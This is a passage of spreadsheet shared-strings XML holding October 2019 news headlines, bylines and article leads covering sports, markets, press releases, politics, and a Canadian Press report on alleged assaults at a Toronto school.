said Altidore did some work with the ball and some running on Friday and will undergo another fitness test early on Saturday before a final decision is made. “Varying sort of his high-speed running, trying to increase the amount of speed he’s putting in, varying the distances in terms of ball striking, things like that — just trying to functionally get to things he would encounter in the game,” said Vanney. “Not a ton of playing in any of that.” As for D.C. United, they have been preparing with the understanding that Altidore, who scored 11 goals in 22 games for TFC this season, along with seven assists, will play. “He’s got a lot of presence, he’s a big body,” said D.C. United goalkeeper Bill Hamid. “There’s a reason why he’s played so many matches and scored so many goals for the national team and played all over the world. He’s got a lot of talent and it’s going to be a challenge to try to lock him down.” Altidore has scored some huge goals during his TFC career, none bigger than the opening goal in the 2017 MLS Cup final in the 67th minute. Toronto went on to win the match 2–0 at BMO Field and Altidore was named the MLS Cup MVP.</t>
  </si>
  <si>
    <t>Comment: The UK government's 'Countering Extremism' strategy is designed to criminalise dissent and demonise Muslims, writes Malia Bouattia.</t>
  </si>
  <si>
    <t>Watch the latest Denver 7 headlines any time.</t>
  </si>
  <si>
    <t>AUSTIN, Texas, Oct. 9, 2019 /PRNewswire/ -- Radiant Plumbing &amp; Air Conditioning, Austin's No. 1 plumbing and air conditioning home repair...</t>
  </si>
  <si>
    <t>Kieran Tierney insists he made the hardest decision of his life to leave Celtic for Arsenal, but is now fully committed to helping the...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 14, 2019 /PRNewswire/ -- Bragar Eagel &amp; Squire, P.C. is investigating potential claims against the board of directors of...</t>
  </si>
  <si>
    <t>Personal trainer and nutritionist, Bruce Crain of Mississippi, helps clients manage their increased appetite after high-intensity training...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 16, 2019 /PRNewswire/ -- Purified Terephthalic Acid market worldwide is projected to grow by US$18.5 Billion, driven by a...</t>
  </si>
  <si>
    <t>Tampa, FL - (NewMediaWire) - October 01, 2019 - B2Digital Inc. (OTC:BTDG) (“B2Digital” or “the Company”) today announces that HRMMA Fight...</t>
  </si>
  <si>
    <t>Sarah Lewis</t>
  </si>
  <si>
    <t>For fantasy owners, picking wide receivers that are going to have a big game is a challenge. It seemed like D.J. Chark Jr. and/or Dede...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Oct. 07, 2019 (GLOBE NEWSWIRE) -- Hagens Berman Sobol Shapiro LLP reminds investors in ADTRAN, Inc. (NASDAQ: ADTN) of...</t>
  </si>
  <si>
    <t>Tim Paine acknowledges the crowd after his century, one of eight in the Shield's opening round. Australia's top-order batsmen have found...</t>
  </si>
  <si>
    <t>Lori Lizarraga</t>
  </si>
  <si>
    <t>There are all kinds of love stories, but this one is unique. A woman and her son fell in love with horses and they say, it saved them.</t>
  </si>
  <si>
    <t>England fly-half George Ford believe that there is more to come from tournament hosts Japan as the Rugby World Cup moves on to the knockout...</t>
  </si>
  <si>
    <t>Meran's lawyer says his client can't remember shooting spree</t>
  </si>
  <si>
    <t>A woman who has campaigned for safety improvements on a "dangerous" road since her husband was seriously hurt in a crash says she has...</t>
  </si>
  <si>
    <t>David R. Rahn &amp; Associates Inc. lowered its position in shares of Invesco S&amp;P 500 Low Volatility ETF (NYSEARCA:SPLV) by 1.2% in the third...</t>
  </si>
  <si>
    <t>Erik Rush says that conservatives must “find a way to effectively and completely disenfranchise leftists in America.” Has the annual “War...</t>
  </si>
  <si>
    <t>WEST PALM BEACH, FL / ACCESSWIRE / October 18, 2019 / Solitron Devices, Inc. (OTC PINK:SODI) ("Solitron" or the "Company") today announced...</t>
  </si>
  <si>
    <t>Sarah Clapson</t>
  </si>
  <si>
    <t>Our Reds reporter answers your questions in a live Q&amp;A Goalscorer Joe Lolley after Nottingham Forest's draw at Blackburn Rovers It’s...</t>
  </si>
  <si>
    <t>The French data firm Atos has been awarded a new £25 million contract with the UK’s Ministry of Defence, just months after winning a £394.7...</t>
  </si>
  <si>
    <t>Liam Casey</t>
  </si>
  <si>
    <t>TORONTO — A former student of an all-boys Catholic school in Toronto alleges in court documents that the bullying and sexual assault he suffered at the hands of his schoolmates left him struggling with depression and severe mental health issues. The details of the incidents alleged to have taken place at St. Michael's College School last fall are contained in a motion filed in Superior Court this week. The teen alleges teachers, staff and football coaches at the prestigious private school knew about the incidents, but did nothing. The teen and his parents, who are not named in the documents, say they plan to file a $1.65-million lawsuit against the school, three former students, the board, the Basilian Fathers who run the institution, the coaches and administration. The allegations contained in the motion have not been proven in court and those named in the proposed lawsuit have not yet responded. Police launched an investigation last November into allegations of assault and sexual assault at the school that led to charges against seven teens. Three of the teens have since pleaded guilty to sex assault with a weapon and assault with a weapon — one also pleaded guilty to making child pornography. Another teen is facing trial next year, while the cases against three others have concluded. The teen, who is referred to as John Doe, alleges in court documents he was taunted and bullied from September 2018, when the first incident took place, until mid-November when he withdrew from the school. In one of the incidents, the teen, who was a member of a school football team, alleges he was in the locker room when three teammates grabbed him, pinned him to the floor and pulled down his pants. Then, he claims, the three boys hit his buttocks repeatedly with a broom stick. The incident was captured on cellphone video and shared widely within and outside the school, the documents say. In mid-October, the teen says he was jumped again in the locker room after practice, pinned down and several students repeatedly inserted a broom handle into his anus. The incident was again filmed, but later deleted at the teen's request, according to the documents. After the first incident, the teen says he heard repeated taunts of "John Doe loves broom" while on campus. After the alleged sexual assault, a "John Doe loves broom" music track was shared widely on social media, he says. The teen's father says in an affidavit it is "difficult to describe the immense amount of pain, suffering, embarrassment and humiliation" the teen and his family have endured since the incidents. He says his son suffered "months of intense ridicule and taunting." The teen suffers from anxiety, depression, emotional trauma and insomnia, according to the documents. The family is asking court to protect their identities in the upcoming civil suit, and a judge is expected to hear the case on Nov. 4. This report by The Canadian Press was first published Oct. 18, 2019.</t>
  </si>
  <si>
    <t>Zac Brown Band’s sixth studio album, The Owl, debuted at No. 1 on Billboard’s Top Country Albums chart. The Owl moved 106,000 equivalent...</t>
  </si>
  <si>
    <t>By Andrew Sheeler</t>
  </si>
  <si>
    <t>E-cigarette manufacturer Juul Labs must restrict its marketing and promotion to avoid targeting minors under a new legal settlement...</t>
  </si>
  <si>
    <t>A 1972 film which shows Martin McGuinness sitting in a car that was later used to bomb Londonderry was “banned” from being shown, it has...</t>
  </si>
  <si>
    <t>Cast: Aaron Paul, Charles Baker, Matt Jones, Jesse Plemons Director: Vince Gilligan As much as one could predict for matters in the...</t>
  </si>
  <si>
    <t>By JIM ARMSTRONG AP Sports Writer</t>
  </si>
  <si>
    <t>Novak Djokovic continued his dominant run at the Japan Open, overpowering third-seeded David Goffin in straight sets on Saturday to reach...</t>
  </si>
  <si>
    <t>Media, Pa. (KYW/CNN) - Authorities in Pennsylvania are still searching for a 15-year-old girl, who has been missing for 11 days, but now,...</t>
  </si>
  <si>
    <t>Bruce Bell</t>
  </si>
  <si>
    <t>After the opening month of the Ontario Junior Hockey League season, the Wellington Dukes have proved their never out of a game and they are...</t>
  </si>
  <si>
    <t>Mobeus Income &amp; Growth VCT PLC (LON:MIX) traded down 2.3% during trading on Friday . The company traded as low as GBX 64 ($0.84) and last...</t>
  </si>
  <si>
    <t>The Patriots have signed tight ends Ben Watson and Eric Tomlinson and released quarterback Cody Kessler. New England announced the moves...</t>
  </si>
  <si>
    <t>The wife of crooner Sir Rod Stewart has broken down in tears while discussing her husband's prostate cancer diagnosis. Sir Rod, 74, was...</t>
  </si>
  <si>
    <t>&gt;Thought Technology is proud to showcase its Peak Performance product line at the 34th Annual Conference of the Association for Applied...</t>
  </si>
  <si>
    <t>Kelvin Fletcher and Oti Mabuse are beginning to dominate Strictly Come Dancing after a huge score. Despite having less time to train after...</t>
  </si>
  <si>
    <t>National Geographic, with Imagine Television Studios and Fox 21 Television Studios, announced today that Tony®-, Emmy®- and Grammy®...</t>
  </si>
  <si>
    <t>By Marianne Garvey, CNN An attorney for Robert De Niro is disputing allegations of gender discrimination by a former employee against the...</t>
  </si>
  <si>
    <t>Christina Hendricks 0 comment Mad Men actress Christina Hendricks has split from her husband of 10 years, the actor Geoffrey Arend. In a...</t>
  </si>
  <si>
    <t>Basil Hegazi Homepage editor</t>
  </si>
  <si>
    <t>The International Cricket Council has announced plans to change the rules of the super over which saw England win the World Cup on...</t>
  </si>
  <si>
    <t>Stanley Cup Champion and Conn Smythe Trophy winner Ryan O'Reilly of the St. Louis Blues joins Ray and Darren and talks about what it was...</t>
  </si>
  <si>
    <t>TPC Wire &amp; Cable Corp. (TPC), a portfolio company of Audax Private Equity, announced today that it has completed the acquisition of Cicoil...</t>
  </si>
  <si>
    <t>SHENZHEN, China, Oct. 18, 2019 /PRNewswire/ -- Shenzhen Fangdd Network Group Ltd. ("FangDD") has officially submitted its prospectus on...</t>
  </si>
  <si>
    <t>@NiallOfficial</t>
  </si>
  <si>
    <t>Roman Kemp has been left with a tattoo that reads “Nice To Melt Ya” instead of the title of Niall Horan’s new song Nice To Meet Ya after...</t>
  </si>
  <si>
    <t>FILE - In this Jan. 16, 2019, file photo veterinary medical application student senior Caroline Crawford, 17, checks the capillary refill...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 2, 2019 /PRNewswire/ -- Persistent Systems, LLC ("Persistent") announced today that Lockheed Martin (NYSE: LMT) Procerus...</t>
  </si>
  <si>
    <t>CRV431 Decreased Liver Fibrosis and Tumor Burden in Experimental Models EDISON, NJ / ACCESSWIRE / October 16, 2019 / Hepion...</t>
  </si>
  <si>
    <t>RICHARDSON, Texas, Oct. 07, 2019 (GLOBE NEWSWIRE) -- In a recent proof-of-concept field trial, Verizon and NEC were able to use network...</t>
  </si>
  <si>
    <t>/CNW/ - Matthew Loden, CEO of the Toronto Symphony Orchestra (TSO), tonight announced to a packed auditorium at Roy Thomson Hall a gift of $10 million from the estate of long-standing supporters and patrons Tom and Mary Beck. The gift is the largest single donation in the Orchestra's history. This donation brings the lifetime giving of the Beck family to the TSO to over $20 million. This historic $10-million gift from the Estate of H. Thomas and Mary Beck has an impact that is immediate and lasting. In accordance with the wishes of the family, the gift has been directed toward the support of key artistic initiatives over the coming years, as well as important financial objectives including the reduction of the accumulated deficit and growing the Toronto Symphony Foundation endowment. "My profound thanks to the Beck family on behalf of the entire TSO community. The gift from the Estate of H. Thomas and Mary Beck is the culmination of a lifetime of generosity, and represents an incredible legacy for all of us at the TSO to steward—we are deeply grateful. The Becks' support ensures continued bold artistic programming in the coming seasons, and will reinforce investments in education, community engagement, and audience development, which are all vital to the mission of the TSO," says Matthew Loden, CEO. "Tom and Mary Beck were the kind of friends and supporters that every arts organization dreams of," says Sir Andrew Davis, the TSO's Interim Artistic Director. "They loved the music of the Toronto Symphony passionately and believed that what it gave and continues to give to Toronto and the world is no mere luxury but rather a vital part of the fabric of life." In addition to their generous donations over the years, the Becks showed their love of the symphony with their time and energy. Tom, who passed away in 2015, sat on the Board of Directors for 22 years, and served as Chair in the early 80s. Mary, who passed away last year, was a constant and supportive presence, beloved by the musicians. Both Tom and Mary welcomed TSO musicians into their lives with warmth and grace. The family legacy lives on through their children Anthony, Liddy, and Cathy. Currently Chair of the TSO Board, Cathy Beck has served as a Director since 2015. For more on the life and legacy of Tom and Mary Beck, click here. About the TSO One of Canada's most respected arts organizations, the Toronto Symphony Orchestra (TSO) plays a vital role in the city's dynamic cultural life. Committed to serving local and national communities through vibrant performances and expansive educational activities, the TSO offers a wide range of programming that resonates with people of all ages and backgrounds. With a notable recording and broadcast history complementing international touring engagements, the TSO is a unique musical ambassador for Canada around the world. The TSO continues its long-established history of connecting younger generations with orchestral music. Two core programs include School Concerts, performed for over 40,000 students annually, and the Toronto Symphony Youth Orchestra (TSYO), which, in a tuition-free model, offers high-level orchestral training for talented young musicians aged 22 and under. Additionally, the TSO supports the development of next-generation artists through its annual open call for Canadian orchestral scores, and its essential Resident Conductor and Affiliate Composer positions. Sir Andrew Davis serves as TSO Interim Artistic Director for the 2019/20 season, prior to the arrival of incoming Music Director Gustavo Gimeno in 2020/21. Sir Andrew Davis is well known to Toronto audiences, having a 44-year relationship with the TSO and returning to the TSO stage regularly. The TSO was founded in 1922 by a group of Toronto musicians and gave its first performance at the historic Massey Hall. Since 1982, Toronto's iconic Roy Thomson Hall has been the TSO's home, drawing patrons from around the world. Soon to celebrate its centenary, the Toronto Symphony Orchestra's name remains synonymous with musical versatility and growth, and artistic distinction.</t>
  </si>
  <si>
    <t>Technavio has been monitoring the global offshore support vessel market since 2016 and the market is poised to grow by USD 927.39 million...</t>
  </si>
  <si>
    <t>\n Democratic presidential candidate Sen. Bernie Sanders, I-Vt., leaves after speaking at a campaign event, Sunday, Sept. 29, 2019, at...</t>
  </si>
  <si>
    <t>By Joe Lawlor</t>
  </si>
  <si>
    <t>Organizers of the National Period Day demonstrations want to improve access to feminine hygiene products for low-income women and others.</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 1, 2019 /PRNewswire/ -- Oppenheimer &amp; Co. Inc. ("Oppenheimer") – a leading investment bank, wealth manager, and a subsidiary...</t>
  </si>
  <si>
    <t>TV show South Park and a major video game studio are the latest businesses to get swept into a controversy over how to handle China's...</t>
  </si>
  <si>
    <t>VAUGHN, ON / ACCESSWIRE / October 16, 2019 / Vlad Rigenco is pleased to announce that his new app, Dood Inc. is set to release its alpha...</t>
  </si>
  <si>
    <t>ANKARA, Turkey (AP) — The Latest on a U.S. delegation's trip to Turkey (all times local):</t>
  </si>
  <si>
    <t>The Westpac Banking Corp (ASX:WBC) share price offers a grossed-up dividend yield of 9.5%, is it a buy?</t>
  </si>
  <si>
    <t>Sometimes, it might seem like shooting a film or a TV Series is the apex of the job, its conclusion. However, it is just a new beginning:...</t>
  </si>
  <si>
    <t>The Associated Press - By By ZEKE MILLER and JILL COLVIN - Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The White House declared Tuesday it will not cooperate with what it termed the "illegitimate" impeachment probe by House...</t>
  </si>
  <si>
    <t>OKLAHOMA CITY (AP) — A Democratic state representative from Oklahoma City and other advocates for more restrictive gun laws have filed a...</t>
  </si>
  <si>
    <t>GLENDALE, CA / ACCESSWIRE / October 3, 2019 / We are delighted to announce that our Plasma Technology Conference in Vienna, Austria from...</t>
  </si>
  <si>
    <t>GlobeNewswire</t>
  </si>
  <si>
    <t>G2 Fall 2019 Rankings Inform Marketing Technology Buying Decisions SAN JOSE, Calif. and BRUSSELS, Belgium, Oct. 08, 2019 (GLOBE NEWSWIRE)...</t>
  </si>
  <si>
    <t>(MENAFN - Colombo Gazette) Zimbabwe was readmitted by the ICC Board following a meeting with the ICC Chairman and Chief Executive, Zimbabwe...</t>
  </si>
  <si>
    <t>Spirit of America Management Corp NY decreased its stake in Enable Midstream Partners LP (NYSE:ENBL) by 1.8% in the 3rd quarter,...</t>
  </si>
  <si>
    <t>Kelly Taylor Hayes</t>
  </si>
  <si>
    <t>CINCINNATI - Forget gingerbread houses. This holiday season you’ll be able to build a house made of Oreo cookies. Oreo’s Holiday...</t>
  </si>
  <si>
    <t>Peter Brewer</t>
  </si>
  <si>
    <t>Agitation is growing over delays in pushing ahead with important lifesaving car technology, as the "silent epidemic" of road crash trauma...</t>
  </si>
  <si>
    <t>STAMFORD, Conn., Oct. 4, 2019 /PRNewswire/ -- Enterprises are looking for technology vendors that can manage their entire IT workloads in...</t>
  </si>
  <si>
    <t>Copyright (c) 2018. RFE/RL, Inc. Republished with the permission of Radio Free Europe/Radio Liberty, 1201 Connecticut Ave NW, Ste 400, Washington DC 20036</t>
  </si>
  <si>
    <t>Alcohol consumption in Russia declined by 43 percent from 2003 to 2016, leading to a dramatic increase of life expectancy, the World Health...</t>
  </si>
  <si>
    <t>CF Industries Holdings, Inc. (NYSE: CF) today reported that its Board of Directors has declared a $0.30 per share dividend on its common...</t>
  </si>
  <si>
    <t>Houston, TX, October 02, 2019 --(PR.com)-- Over the past several years, AI has grown in relevance and adoption within the upstream oil and...</t>
  </si>
  <si>
    <t>NEW HAVEN, Conn., Oct. 15, 2019 /PRNewswire/ -- PatientWisdom, Inc., the digital health company with a suite of solutions that improve...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 8, 2019 /PRNewswire/ -- The "US Military Combat Vehicle Market, Forecast to 2024" report has been added to...</t>
  </si>
  <si>
    <t>Nick Kelly</t>
  </si>
  <si>
    <t>The offensive line expected a run. Kelly Bryant went pass. Then, Troy defensive tackle Travis Sailo broke past guard Tre’Vour Wallace-Simms...</t>
  </si>
  <si>
    <t>FlipBuilder has taken its digital software development expertise to the next level by releasing stunning background templates that can be...</t>
  </si>
  <si>
    <t>DALLAS, Oct. 2, 2019 /PRNewswire/ -- A HealthMine survey revealed that Medicare Advantage (MA) beneficiaries are mostly unsure, or cannot...</t>
  </si>
  <si>
    <t>Nordex (ETR:NDX1) has been assigned a €10.20 ($11.86) target price by research analysts at HSBC in a research note issued to investors on...</t>
  </si>
  <si>
    <t>CLEVELAND, Oct. 18, 2019 /PRNewswire/ -- Julia Radefeld has joined the Cleveland office of McDonald Hopkins as an associate in the...</t>
  </si>
  <si>
    <t>Oct, Tue 15 2019 - 11:00 AM to 2:00 PM</t>
  </si>
  <si>
    <t>WAYNE PARRY Associated Press</t>
  </si>
  <si>
    <t>ATLANTIC CITY, N.J. (AP) — Here’s one Houston Astros fan who’s putting his considerable money where his mouth is. Jim McIngvale, a...</t>
  </si>
  <si>
    <t>CNBC.com News</t>
  </si>
  <si>
    <t>UNICEF, the U.N.'s charity for children, launched a cryptocurrency fund that will enable the organization to receive donations in bitcoin...</t>
  </si>
  <si>
    <t>Dave Smith</t>
  </si>
  <si>
    <t>Face ID, available on the iPhone X, XS,XR,11, and 11 Pro, doesn’t always work with sunglasses. Apple explained why this is the case: It has...</t>
  </si>
  <si>
    <t>Vineland dealership offers one of the latest Honda sedans in various trim levels.</t>
  </si>
  <si>
    <t>Chris West</t>
  </si>
  <si>
    <t>If you’re an avid enthusiast of genre-defining backpacks, Colorado’s Topo Designs should definitely be on your radar. Not only does the...</t>
  </si>
  <si>
    <t>Andrew J. Yawn, Lafayette Daily Advertiser</t>
  </si>
  <si>
    <t>NEW ORLEANS – A video posted on social media claiming to show structural problems inside the Hard Rock Hotel construction site two days...</t>
  </si>
  <si>
    <t>CHICAGO, Oct. 14, 2019 /PRNewswire-PRWeb/ -- Ziegler, a specialty investment bank, is pleased to announce the successful closing of the...</t>
  </si>
  <si>
    <t>Verition Fund Management LLC reduced its stake in shares of Herc Holdings Inc. (NYSE:HRI) by 77.1% in the second quarter, according to its...</t>
  </si>
  <si>
    <t>Art San Diego is unique in bringing exceptional artwork from local, national, and international galleries together alongside outstanding...</t>
  </si>
  <si>
    <t>CLEARWATER, Fla., Oct. 03, 2019 (GLOBE NEWSWIRE) -- On October 26th, the Clearwater Community Volunteers will host a spooky tea party in...</t>
  </si>
  <si>
    <t>Fleabag star Sian Clifford wants the gatekeepers of television to step aside for upcoming talent.</t>
  </si>
  <si>
    <t>Faizan Hashmi</t>
  </si>
  <si>
    <t>Turkish President Recep Tayyip Erdogan may see a short-term boost in his popularity at home after starting yet another military operation...</t>
  </si>
  <si>
    <t>Ian Laybourn</t>
  </si>
  <si>
    <t>Great Britain coach Wayne Bennett has named former NRL stars Blake Austin, Lachlan Coote and Jackson Hastings in his squad for the upcoming...</t>
  </si>
  <si>
    <t>Pura Naturals Inc. (OTCPINK: PNAT) (“Pura” or the “Company”), makers of eco-friendly earth-conscious cleaning products, today announced...</t>
  </si>
  <si>
    <t>RACINE, Wis., Oct. 8, 2019 /PRNewswire/ -- Modine Manufacturing Company (NYSE: MOD), a diversified global leader in thermal management...</t>
  </si>
  <si>
    <t>Overnight closures of Summer and Beacon streets in Framingham begin Monday night at 7 p.m. near Concord Street.</t>
  </si>
  <si>
    <t>Square Clover, Inc, a managed services provider, announces that North Carolina Services for Dentistry (NCSD) selected their Desktop...</t>
  </si>
  <si>
    <t>CannTrust Advances its Plan Towards Regulatory Compliance [14-October-2019] Company to provide detailed remediation plan to Health...</t>
  </si>
  <si>
    <t>By Kevin Modesti | kmodesti@scng.com | Daily News</t>
  </si>
  <si>
    <t>Coach Sean McVay is hopeful newly acquired CB Jalen Ramsey and RB Todd Gurley will play Sunday in Atlanta</t>
  </si>
  <si>
    <t>(StatePoint) While most people care about their vision, fewer people take steps to protect their eye health. Open enrollment season,...</t>
  </si>
  <si>
    <t>Walt Disney World has opened a lounge based on the live-action film "Beauty and the Beast." The Enchanted Rose operates off the...</t>
  </si>
  <si>
    <t>A Syrian man has been arrested on suspicion of hijacking a truck and ramming it into traffic in western Germany on Monday night, injuring...</t>
  </si>
  <si>
    <t>Nebraska and Illinois will open up the 2021 college football season overseas. The Cornhuskers and Fighting Illini will play each other in...</t>
  </si>
  <si>
    <t>RALEIGH, N.C., Oct 18, 2019 (SEND2PRESS NEWSWIRE) -- Capital Subaru of Greensboro will host a free dog wash event in honor of Subaru's...</t>
  </si>
  <si>
    <t>PADUCAH, Ky. (AP) — A Kentucky hotel clerk managed to force a thief out of her workplace by grabbing a gun he set down on the check-in...</t>
  </si>
  <si>
    <t>Tom Watson has said he feels “very deeply” for those caught up in the failed police investigation into an alleged Westminster paedophile...</t>
  </si>
  <si>
    <t>Former Secretary of State Hillary Clinton answers a question posed by student journalists during the Trailblazing Women of Park Ridge event...</t>
  </si>
  <si>
    <t>BANI SAPRA</t>
  </si>
  <si>
    <t>In this Sept. 18, 2019, photo a Puckett Machinery Company technician walks past a new heavy duty Caterpillar excavator that awaits...</t>
  </si>
  <si>
    <t>A proposal to label Stoughton’s entire downtown as a historic district would give the Landmarks Commission review authority of the look and...</t>
  </si>
  <si>
    <t>Englewood, CO, October 11, 2019 --(PR.com)-- HCA Healthcare/HealthONE’s Swedish Medical Center, a level I trauma center and the Rocky...</t>
  </si>
  <si>
    <t>The "UK HIV/AIDS Diagnostics Market Shares, Segmentation Forecasts, Competitive Landscape, Innovative Technologies, Latest Instrumentation,...</t>
  </si>
  <si>
    <t>Ingram Micro Commerce &amp; Lifecycle Services today announced the opening of a second IT Asset Disposition (ITAD) Processing Center in the...</t>
  </si>
  <si>
    <t>DETROIT — As the U.S. strike by the United Auto Workers union against General Motors Co nears three weeks, the main remaining issues in the...</t>
  </si>
  <si>
    <t>Oil prices lost about 2% on Monday on worries that global crude demand could stay under pressure as few details about the first phase of a...</t>
  </si>
  <si>
    <t>BOULDER, Colo., Oct. 17, 2019 (GLOBE NEWSWIRE) -- Entelligent, a Colorado technology company focused on climate change, announced today a...</t>
  </si>
  <si>
    <t>Two Tunisian radio stations reported on Monday that a French citizen was killed and a soldier injured in a stabbing incident in the city of...</t>
  </si>
  <si>
    <t>Joseph Sandoval</t>
  </si>
  <si>
    <t>Analysts expect Eagle Bulk Shipping Inc. (NASDAQ:EGLE) to report $-0.01 EPS on November, 5.They anticipate $0.05 EPS change or 125.00 %...</t>
  </si>
  <si>
    <t>To celebrate our beautiful, new, and improved Simple Hosting landing page we’re giving you the chance to get your Simple Hosting instance...</t>
  </si>
  <si>
    <t>CAMBRIDGE, Mass.–(BUSINESS WIRE)–TILT Holdings Inc. (“TILT” or the “Company”) (CSE: TILT) (OTCQB: TLLTF), a foundational technology...</t>
  </si>
  <si>
    <t>Heeke says he's sympathetic to fans about late start times but is focused more on items he and his team can control, such as the in-stadium...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 4, 2019 /PRNewswire/ -- Oakland, CA native Sway Calloway returns to his roots on October 18 for the first ever 'Sway Fest...</t>
  </si>
  <si>
    <t>SAN FRANCISCO — The Latest on a GOP attorney’s lawsuit against California for alleged voter violations (all times local): 2:10 p.m....</t>
  </si>
  <si>
    <t>TORONTO, Oct. 03, 2019 (GLOBE NEWSWIRE) -- Toronto Real Estate Board President Michael Collins announced that Greater Toronto Area...</t>
  </si>
  <si>
    <t>Terrorism risk is more prevalent in major cities than in small towns, but given the unpredictability of violence, should suburban areas be...</t>
  </si>
  <si>
    <t>Stephanie Baumer, Digital Content Producer</t>
  </si>
  <si>
    <t>PINE LAWN, Mo. (KMOV.com) – Days after a father was charged with the murder of his son, a memorial will be held for Christian’s Ferguson...</t>
  </si>
  <si>
    <t>Stephanie Talbot</t>
  </si>
  <si>
    <t>When: October 3 2019</t>
  </si>
  <si>
    <t>Four-time AFL premiership player Grant Birchall will play for Brisbane next season after agreeing to join the club as an unrestricted free...</t>
  </si>
  <si>
    <t>MIAMI (AP) — The Latest on Tropical Storm Nestor (all times local): 5:10 p.m. Nestor has begun moving through Georgia as a post-tropical...</t>
  </si>
  <si>
    <t>Esters Synthetic Lubricants Market 2019 Report offers a professional and in-depth study on the current state of the Global Esters Synthetic...</t>
  </si>
  <si>
    <t>The analysts forecast the world Aesthetic Devices market to show a CAGR of five.36% during the length 2019-2024. The file covers the latest...</t>
  </si>
  <si>
    <t>Ukrainian President Volodymyr Zelenskiy has said his country will “happily” investigate whether there was any interference in the 2016 US...</t>
  </si>
  <si>
    <t>by Jonathon Moran</t>
  </si>
  <si>
    <t>KYLE Sandilands has finally returned home to Sydney after spending more than two weeks on holiday in the US. Sandilands has been holed up...</t>
  </si>
  <si>
    <t>OKLAHOMA CITY, OK — An 80-year-old suburban Oklahoma City man has been formally charged in the fatal shooting of his 77-year-old wife, who...</t>
  </si>
  <si>
    <t>Stephen Wynn-Davies</t>
  </si>
  <si>
    <t>Hastings’ Britain’s Got Talent auditions cancelled - Rye and Battle Observer</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 2, 2019 /PRNewswire/ -- The "Middle East &amp; Africa OTR Tire Market (2019-2025): Market Forecast by Types, by Vehicle Types, by...</t>
  </si>
  <si>
    <t>Alfred Konuwa</t>
  </si>
  <si>
    <t>WWE Friday Night SmackDown news, notes and business analysis from season premiere on October 4, 2019 from the Staples Center in Los...</t>
  </si>
  <si>
    <t>NEW YORK (AP) -- Aaron Hicks is an option to start for the New York Yankees in the AL Championship Series opener and CC Sabathia also...</t>
  </si>
  <si>
    <t>*LOS ANGELES, CA / ACCESSWIRE / October 14, 2019 / *MjLink.com Inc. a wholly owned subsidiary of Social Life Network, Inc. (OTCQB:WDLF), is...</t>
  </si>
  <si>
    <t>NEXT Financial Group Inc decreased its position in PacWest Bancorp (NASDAQ:PACW) by 23.5% in the 3rd quarter, according to the company in...</t>
  </si>
  <si>
    <t>By Trends Desk</t>
  </si>
  <si>
    <t>The official Instagram handle of the Kensington Palace later shared a video of the couple reaching the venue, triggering reactions from...</t>
  </si>
  <si>
    <t>by Sinclair Broadcast Group</t>
  </si>
  <si>
    <t>"America This Week" is an hour-long program featuring interviews with lawmakers, administration officials, and politicians with unique...</t>
  </si>
  <si>
    <t>Tickers: PINX:NLPXF, XTSX:NOB, FRAA:NB7 Tags: #Mining - Mark Selby Appointed Chairman and CEO of Canada Nickel Company - 100% Consolidation...</t>
  </si>
  <si>
    <t>RumbleOn (NASDAQ: RMBL), the e-commerce company using innovative technology to simplify how dealers and consumers buy, sell, trade, or...</t>
  </si>
  <si>
    <t>Anna Harrington</t>
  </si>
  <si>
    <t>Former AFL No.1 draft pick Jonathon Patton has been traded to Hawthorn. On Tuesday, GWS confirmed Patton had been traded for a future...</t>
  </si>
  <si>
    <t>Megan VerHelst, Patch Staff</t>
  </si>
  <si>
    <t>At $3.2 million, Fredericksburg's most expensive home for sale, according to Realtor.com, is a historic home located in the city's...</t>
  </si>
  <si>
    <t>The "Process Validation with Qualification" conference has been added to ResearchAndMarkets.com's offering. Gain a comprehensive...</t>
  </si>
  <si>
    <t>Herpes Simplex Virus Infections market worldwide is projected to grow by US$1. 4 Billion, driven by a compounded growth of 4. 2%. Herpes...</t>
  </si>
  <si>
    <t>(Bloomberg) -- The U.S. House gave support to pro-democracy protesters in Hong Kong by passing a measure that would require an annual...</t>
  </si>
  <si>
    <t>TNW</t>
  </si>
  <si>
    <t>Cumbria Crack</t>
  </si>
  <si>
    <t>A TEENAGER has admitted his dangerous driving caused life-changing injuries to two pedestrians who were badly hurt in a horror crash in...</t>
  </si>
  <si>
    <t>By Carly Stern For Dailymail.com</t>
  </si>
  <si>
    <t>Oprah, 65, and Stedman Graham, 65, have been together since 1986, and even got engaged in 1992 She told People that if she had to play by...</t>
  </si>
  <si>
    <t>Cory Doctorow</t>
  </si>
  <si>
    <t>Emily Wilson is the author of a new "lean, fleet-footed translation" of Homer's Odyssey that "recaptures Homer's 'nimble gallop.'" To...</t>
  </si>
  <si>
    <t>Leah Asmelash, CNN</t>
  </si>
  <si>
    <t>Glitter is probably making money off of it</t>
  </si>
  <si>
    <t>Tony Maglio</t>
  </si>
  <si>
    <t>NBC and CBS do their regular Tuesday split Ratings are “Mixed-ish” {{{ data.excerpt }}}</t>
  </si>
  <si>
    <t>Leading cars in the World Solar Challenge have raced into South Australia on the third day of their journey from Darwin to Adelaide. The...</t>
  </si>
  <si>
    <t>No evidence FBI directed CBSA exam of Meng: Crown</t>
  </si>
  <si>
    <t>Leah Bracknell 0 comment ITV remembered Leah Bracknell as a “hugely popular member of the Emmerdale cast”, after the actress’s death at...</t>
  </si>
  <si>
    <t>Jacquelyn Byrd</t>
  </si>
  <si>
    <t>The anticipation for Doom Eternal, the follow-up to the 2016 reboot, has been through the roof since its first teaser announcement at...</t>
  </si>
  <si>
    <t>Alexander Netherton</t>
  </si>
  <si>
    <t>Josh Brookes claimed his 15th win at Brands Hatch in Race One on Saturday.</t>
  </si>
  <si>
    <t>SHANGHAI, Oct. 11, 2019 /PRNewswire/ -- Kangpu Biopharmaceuticals announced today that it has successfully completed a first-in-human phase...</t>
  </si>
  <si>
    <t>PHILADELPHIA, Oct. 10, 2019 (GLOBE NEWSWIRE) -- Carpenter Technology Corporation (NYSE: CRS) plans to host a conference call and webcast...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 18, 2019 /PRNewswire-PRWeb/ -- Love Stories TV, the first and only destination for inspiration and ideas from real wedding...</t>
  </si>
  <si>
